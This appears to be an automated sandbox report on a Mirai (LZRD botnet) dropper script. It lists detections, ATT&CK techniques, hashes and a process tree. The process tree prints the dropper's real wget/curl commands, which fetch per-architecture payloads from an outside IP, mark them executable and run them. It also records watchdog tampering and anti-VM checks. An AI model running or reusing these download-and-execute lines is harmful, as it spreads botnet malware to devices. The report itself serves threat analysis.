mirai | f58a06a7be85427f150ab29567daa86227c274acef7657fcb12a74ef64d6b2cb

Analysis

max time kernel
138s
max time network
146s
platform
debian-9_armhf
resource
debian9-armhf-20240729-en
resource tags

arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
01/04/2025, 03:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ohshit.sh
Size

3KB
MD5

49ccb38dd7e10864370e97b7037c2880
SHA1

e0db7b2cf8aecb8664fd87164f638103418eb9ab
SHA256

f58a06a7be85427f150ab29567daa86227c274acef7657fcb12a74ef64d6b2cb
SHA512

cde0c823211fb1a86e88644c9daad843ecb11c49d91256c943d2baef250a2243cd9bcc4c7b68bde3139b441b124503b235bf12583c8c9d22e61a14fe0c59806e

Score

10^/10

mirai lzrd antivm botnet defense_evasion discovery upx

Malware Config

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai

File and Directory Permissions Modification 1 TTPs 15 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
676	chmod
724	chmod
740	chmod
839	chmod
684	chmod
693	chmod
708	chmod
823	chmod
844	chmod
758	chmod
806	chmod
811	chmod
833	chmod
766	chmod
850	chmod

Executes dropped EXE 15 IoCs

ioc	pid	Process
/tmp/Chaotic	677	ohshit.sh
/tmp/Chaotic	685	ohshit.sh
/tmp/Chaotic	695	ohshit.sh
/tmp/Chaotic	709	ohshit.sh
/tmp/Chaotic	725	ohshit.sh
/tmp/Chaotic	741	ohshit.sh
/tmp/Chaotic	760	ohshit.sh
/tmp/Chaotic	767	ohshit.sh
/tmp/Chaotic	807	ohshit.sh
/tmp/Chaotic	812	ohshit.sh
/tmp/Chaotic	824	ohshit.sh
/tmp/Chaotic	834	ohshit.sh
/tmp/Chaotic	840	ohshit.sh
/tmp/Chaotic	845	ohshit.sh
/tmp/Chaotic	851	ohshit.sh

Modifies Watchdog functionality 1 TTPs 6 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/misc/watchdog	Chaotic
File opened for modification	/dev/watchdog	Chaotic
File opened for modification	/dev/misc/watchdog	Chaotic
File opened for modification	/dev/watchdog	Chaotic
File opened for modification	/dev/misc/watchdog	Chaotic
File opened for modification	/dev/watchdog	Chaotic

Enumerates running processes
Discovers information about currently running processes on the system

Writes file to system bin folder 6 IoCs

description	ioc	Process
File opened for modification	/bin/watchdog	Chaotic
File opened for modification	/sbin/watchdog	Chaotic
File opened for modification	/bin/watchdog	Chaotic
File opened for modification	/sbin/watchdog	Chaotic
File opened for modification	/bin/watchdog	Chaotic
File opened for modification	/sbin/watchdog	Chaotic

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/fstream-5.dat	upx
behavioral2/files/fstream-6.dat	upx
behavioral2/files/fstream-7.dat	upx
behavioral2/files/fstream-8.dat	upx

Checks CPU configuration 1 TTPs 15 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

description	ioc	Process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/140/status	Chaotic
File opened for reading	/proc/3/status	Chaotic
File opened for reading	/proc/26/status	Chaotic
File opened for reading	/proc/581/status	Chaotic
File opened for reading	/proc/10/status	Chaotic
File opened for reading	/proc/140/status	Chaotic
File opened for reading	/proc/15/status	Chaotic
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/214/status	Chaotic
File opened for reading	/proc/770/status	Chaotic
File opened for reading	/proc/17/status	Chaotic
File opened for reading	/proc/9/status	Chaotic
File opened for reading	/proc/214/status	Chaotic
File opened for reading	/proc/755/status	Chaotic
File opened for reading	/proc/6/status	Chaotic
File opened for reading	/proc/107/status	Chaotic
File opened for reading	/proc/300/status	Chaotic
File opened for reading	/proc/20/status	Chaotic
File opened for reading	/proc/137/status	Chaotic
File opened for reading	/proc/311/status	Chaotic
File opened for reading	/proc/262/status	Chaotic
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/644/status	Chaotic
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/298/status	Chaotic
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/140/status	Chaotic
File opened for reading	/proc/2/status	Chaotic
File opened for reading	/proc/43/status	Chaotic
File opened for reading	/proc/108/status	Chaotic
File opened for reading	/proc/330/status	Chaotic
File opened for reading	/proc/self/exe	Chaotic
File opened for reading	/proc/5/status	Chaotic
File opened for reading	/proc/12/status	Chaotic
File opened for reading	/proc/13/status	Chaotic
File opened for reading	/proc/266/status	Chaotic
File opened for reading	/proc/759/status	Chaotic
File opened for reading	/proc/3/status	Chaotic
File opened for reading	/proc/279/status	Chaotic
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/279/status	Chaotic
File opened for reading	/proc/43/status	Chaotic
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/151/status	Chaotic
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/29/status	Chaotic
File opened for reading	/proc/11/status	Chaotic
File opened for reading	/proc/139/status	Chaotic
File opened for reading	/proc/311/status	Chaotic
File opened for reading	/proc/588/status	Chaotic
File opened for reading	/proc/105/status	Chaotic
File opened for reading	/proc/25/status	Chaotic
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/7/status	Chaotic
File opened for reading	/proc/17/status	Chaotic
File opened for reading	/proc/76/status	Chaotic
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/42/status	Chaotic
File opened for reading	/proc/137/status	Chaotic
File opened for reading	/proc/168/status	Chaotic
File opened for reading	/proc/108/status	Chaotic
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/9/status	Chaotic

System Network Configuration Discovery 1 TTPs 6 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
712	wget
717	curl
723	cat
728	wget
732	curl
738	cat

Writes file to tmp directory 30 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.mpsl	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.sparc	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.x86_64	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.i686	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.ppc	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.mips	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.mips	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arc	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.mpsl	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm5	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.sh4	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.x86	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.i686	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.ppc	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.m68k	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.sh4	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.x86	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.x86_64	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm6	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm6	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.m68k	wget
File opened for modification	/tmp/busybox	cp
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arc	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm7	wget
File opened for modification	/tmp/Chaotic	ohshit.sh
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.mips64	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm5	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm7	curl

/tmp/ohshit.sh
/tmp/ohshit.sh
1⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:645
- /bin/cp
  cp /bin/busybox /tmp/
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:647
- /usr/bin/wget
  wget http://194.62.248.25/HideChaotic/ub8ehJSePAfc9FYqZIT6.arc
  2⤵
  - Writes file to tmp directory
  PID:651
- /usr/bin/curl
  curl -O http://194.62.248.25/HideChaotic/ub8ehJSePAfc9FYqZIT6.arc
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:668
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.arc
  2⤵
  PID:674
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh systemd-private-ecf16db582104ccfb48996ce0e08ea22-systemd-timedated.service-7M9PKu ub8ehJSePAfc9FYqZIT6.arc
  2⤵
  - File and Directory Permissions Modification
  PID:676
- /tmp/Chaotic
  ./Chaotic
  2⤵
  PID:677
- /usr/bin/wget
  wget http://194.62.248.25/HideChaotic/ub8ehJSePAfc9FYqZIT6.x86
  2⤵
  - Writes file to tmp directory
  PID:680
- /usr/bin/curl
  curl -O http://194.62.248.25/HideChaotic/ub8ehJSePAfc9FYqZIT6.x86
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:682
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.x86
  2⤵
  PID:683
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh systemd-private-ecf16db582104ccfb48996ce0e08ea22-systemd-timedated.service-7M9PKu ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.x86
  2⤵
  - File and Directory Permissions Modification
  PID:684
- /tmp/Chaotic
  ./Chaotic
  2⤵
  PID:685
- /usr/bin/wget
  wget http://194.62.248.25/HideChaotic/ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - Writes file to tmp directory
  PID:687
- /usr/bin/curl
  curl -O http://194.62.248.25/HideChaotic/ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:688
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  PID:691
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh systemd-private-ecf16db582104ccfb48996ce0e08ea22-systemd-timedated.service-7M9PKu ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:693
- /tmp/Chaotic
  ./Chaotic
  2⤵
  PID:695
- /usr/bin/wget
  wget http://194.62.248.25/HideChaotic/ub8ehJSePAfc9FYqZIT6.i686
  2⤵
  - Writes file to tmp directory
  PID:697
- /usr/bin/curl
  curl -O http://194.62.248.25/HideChaotic/ub8ehJSePAfc9FYqZIT6.i686
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:702
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.i686
  2⤵
  PID:707
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh systemd-private-ecf16db582104ccfb48996ce0e08ea22-systemd-timedated.service-7M9PKu ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:708
- /tmp/Chaotic
  ./Chaotic
  2⤵
  PID:709
- /usr/bin/wget
  wget http://194.62.248.25/HideChaotic/ub8ehJSePAfc9FYqZIT6.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:712
- /usr/bin/curl
  curl -O http://194.62.248.25/HideChaotic/ub8ehJSePAfc9FYqZIT6.mips
  2⤵
  - Checks CPU configuration
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:717
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.mips
  2⤵
  - System Network Configuration Discovery
  PID:723
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh systemd-private-ecf16db582104ccfb48996ce0e08ea22-systemd-timedated.service-7M9PKu ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:724
- /tmp/Chaotic
  ./Chaotic
  2⤵
  PID:725
- /usr/bin/wget
  wget http://194.62.248.25/HideChaotic/ub8ehJSePAfc9FYqZIT6.mips64
  2⤵
  - System Network Configuration Discovery
  PID:728
- /usr/bin/curl
  curl -O http://194.62.248.25/HideChaotic/ub8ehJSePAfc9FYqZIT6.mips64
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:732
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.mips64
  2⤵
  - System Network Configuration Discovery
  PID:738
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh systemd-private-ecf16db582104ccfb48996ce0e08ea22-systemd-timedated.service-7M9PKu ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:740
- /tmp/Chaotic
  ./Chaotic
  2⤵
  PID:741
- /usr/bin/wget
  wget http://194.62.248.25/HideChaotic/ub8ehJSePAfc9FYqZIT6.mpsl
  2⤵
  - Writes file to tmp directory
  PID:742
- /usr/bin/curl
  curl -O http://194.62.248.25/HideChaotic/ub8ehJSePAfc9FYqZIT6.mpsl
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:750
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.mpsl
  2⤵
  PID:756
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh systemd-private-ecf16db582104ccfb48996ce0e08ea22-systemd-timedated.service-7M9PKu ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:758
- /tmp/Chaotic
  ./Chaotic
  2⤵
  PID:760
- /usr/bin/wget
  wget http://194.62.248.25/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm
  2⤵
  - Writes file to tmp directory
  PID:762
- /usr/bin/curl
  curl -O http://194.62.248.25/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:764
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.arm
  2⤵
  PID:765
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh systemd-private-ecf16db582104ccfb48996ce0e08ea22-systemd-timedated.service-7M9PKu ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:766
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:767
- /usr/bin/wget
  wget http://194.62.248.25/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm5
  2⤵
  - Writes file to tmp directory
  PID:803
- /usr/bin/curl
  curl -O http://194.62.248.25/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm5
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:804
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.arm5
  2⤵
  PID:805
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh systemd-private-ecf16db582104ccfb48996ce0e08ea22-systemd-timedated.service-7M9PKu ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:806
- /tmp/Chaotic
  ./Chaotic
  2⤵
  PID:807
- /usr/bin/wget
  wget http://194.62.248.25/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm6
  2⤵
  - Writes file to tmp directory
  PID:808
- /usr/bin/curl
  curl -O http://194.62.248.25/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm6
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:809
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.arm6
  2⤵
  PID:810
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh systemd-private-ecf16db582104ccfb48996ce0e08ea22-systemd-timedated.service-7M9PKu ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:811
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:812
- /usr/bin/wget
  wget http://194.62.248.25/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm7
  2⤵
  - Writes file to tmp directory
  PID:820
- /usr/bin/curl
  curl -O http://194.62.248.25/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm7
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:821
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.arm7
  2⤵
  PID:822
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh systemd-private-ecf16db582104ccfb48996ce0e08ea22-systemd-timedated.service-7M9PKu ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:823
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:824
- /usr/bin/wget
  wget http://194.62.248.25/HideChaotic/ub8ehJSePAfc9FYqZIT6.ppc
  2⤵
  - Writes file to tmp directory
  PID:830
- /usr/bin/curl
  curl -O http://194.62.248.25/HideChaotic/ub8ehJSePAfc9FYqZIT6.ppc
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:831
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.ppc
  2⤵
  PID:832
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh systemd-private-ecf16db582104ccfb48996ce0e08ea22-systemd-timedated.service-7M9PKu ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.ppc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:833
- /tmp/Chaotic
  ./Chaotic
  2⤵
  PID:834
- /usr/bin/wget
  wget http://194.62.248.25/HideChaotic/ub8ehJSePAfc9FYqZIT6.sparc
  2⤵
  PID:836
- /usr/bin/curl
  curl -O http://194.62.248.25/HideChaotic/ub8ehJSePAfc9FYqZIT6.sparc
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:837
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.sparc
  2⤵
  PID:838
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh systemd-private-ecf16db582104ccfb48996ce0e08ea22-systemd-timedated.service-7M9PKu ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.ppc ub8ehJSePAfc9FYqZIT6.sparc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:839
- /tmp/Chaotic
  ./Chaotic
  2⤵
  PID:840
- /usr/bin/wget
  wget http://194.62.248.25/HideChaotic/ub8ehJSePAfc9FYqZIT6.m68k
  2⤵
  - Writes file to tmp directory
  PID:841
- /usr/bin/curl
  curl -O http://194.62.248.25/HideChaotic/ub8ehJSePAfc9FYqZIT6.m68k
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:842
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.m68k
  2⤵
  PID:843
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh systemd-private-ecf16db582104ccfb48996ce0e08ea22-systemd-timedated.service-7M9PKu ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.m68k ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.ppc ub8ehJSePAfc9FYqZIT6.sparc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:844
- /tmp/Chaotic
  ./Chaotic
  2⤵
  PID:845
- /usr/bin/wget
  wget http://194.62.248.25/HideChaotic/ub8ehJSePAfc9FYqZIT6.sh4
  2⤵
  - Writes file to tmp directory
  PID:847
- /usr/bin/curl
  curl -O http://194.62.248.25/HideChaotic/ub8ehJSePAfc9FYqZIT6.sh4
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:848
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.sh4
  2⤵
  PID:849
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh systemd-private-ecf16db582104ccfb48996ce0e08ea22-systemd-timedated.service-7M9PKu ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.m68k ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.ppc ub8ehJSePAfc9FYqZIT6.sh4 ub8ehJSePAfc9FYqZIT6.sparc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:850
- /tmp/Chaotic
  ./Chaotic
  2⤵
  PID:851

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

System Network Configuration Discovery

T1016

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/Chaotic

Filesize
37KB

MD5
31b7d9bdcc8860b4b7c343ca7bb13e6b

SHA1
78aa1238d316015a513c7381177a9383cde94eaf

SHA256
f539661f7ef0d1f43fc8675df50632695f7e0fc437025470deea8364c9e9fa93

SHA512
35e55dfaf6e18e93caade323e304f4e6a61863f8a02920214fb565a516d691ddd0f2d4973ced5457062df3ba1c9ecd47e4cee813aafea36a172e826ddda7e6be

Download Submit
/tmp/Chaotic

Filesize
36KB

MD5
bd2e05897033fc35109d20da6c3771b0

SHA1
42ad14dbd0fbecefa36e311cf079df742a314caa

SHA256
4572a23b7279591e36420a39899e63b236eab041e317a94a16dda43e4f2b36fa

SHA512
883fbc08403223ddf2679a356ac526bc2d6c46dc342ba2650a4dc7b892db8179e2cafdced709df48c5a5ff03bbd43d5ad1316285706816a69260ed3e54aead08

Download Submit
/tmp/Chaotic

Filesize
37KB

MD5
e77c551ac9f0bb7f9a0a8af7f9e3638d

SHA1
635c37fbc2638fa01bd1c52a667e0c6139bfc34d

SHA256
379995d6dc4e45fd1c00e11b8c0b8731eeae693b71534d4b022e4ee8f616bd12

SHA512
f1d932f1a72582bdadbb565dac249d8d3d4df31f4df73c79bf88066e5cb9437cf1f7e8fa634a05bf094718295b2532aae2d346d24db4de4f08b82655147fac31

Download Submit
/tmp/Chaotic

Filesize
43KB

MD5
dea64e52ca9d3136e79e683fc49bea4b

SHA1
4896512359ac2e8e4a9d13bd08bd5ef3697a7f76

SHA256
32d3e68e281da6d6ae3532e712ef8824f9cc3fc79d52726288f518a606d6814f

SHA512
f406e1d450f55755885a41bff425787935ea4eb9a9e372d6355f21a1aefc9ede8d2664107b22f70db84b6487b9b84717cc154d4512fe3637c88f79bf6e5c288f

Download Submit
/tmp/Chaotic

Filesize
95KB

MD5
71a311756086871b7a43a834980618d0

SHA1
5d98837012de3913fd63f3eb5c287ac5efd96d6b

SHA256
e5da285f498737f5d0e1e971f78ff765d91e16790f7c0258d70948c79177ec12

SHA512
cad991aa6d925d3e6f4f4185db27bf6efdafe8089b4b1528bbbe1a4dca7ad3ad5da9f0f87e37aa936d926802fe8884ebbd5c0c341abc3b9ae0f5dbbd2691e95b

Download Submit
/tmp/busybox

Filesize
507KB

MD5
e588bcf03ae78237b58899d35f50c570

SHA1
2194732ebbefbc27bdae876c77f2a97a20175710

SHA256
2dd1fbb8052a89f40c2e9af115d31346e554ee746e9c7a97d651e43e0609df88

SHA512
904d906ec73ba5f828ee453acfceaf60d07b337a4baf1a88a2edba8d4568e4a3ceae2e24116af0a5b9c8ad194faa72abb62a72d30ae236b0852827c7bf896555

Download Submit
/tmp/ub8ehJSePAfc9FYqZIT6.arc

Filesize
113KB

MD5
1af5f72aaf665cac323309f76f213da0

SHA1
fa4508c93f35c4029f6f0d9aa1816615a3108802

SHA256
9d248876bf10b1b3ad498877bf415aae63a2f1a28da9e69eb866a63afcc11c0b

SHA512
